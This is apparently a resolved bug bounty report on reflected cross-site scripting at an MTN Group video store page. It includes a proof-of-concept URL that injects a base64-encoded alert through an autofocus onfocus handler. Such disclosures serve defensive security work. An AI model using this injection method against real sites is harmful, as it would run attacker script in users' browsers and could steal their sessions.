Loading HuntDB...

XSS at videostore.mtnonline.com/GL/*.aspx via all parameters

Medium
M
MTN Group
Submitted None
Reported by homosec

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
PoC ``` https://videostore.mtnonline.com/GL/MyAccount.aspx?PId=126&CID=5&OprId=11%27><input%20onfocus=eval(atob(%27YWxlcnQoJ1hTUycp%27))%20autofocus> ``` Symbols <"/'> are not filtered that alloweds to inject HTML code. {F1353609} ## Impact XSS at videostore.mtnonline.com

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected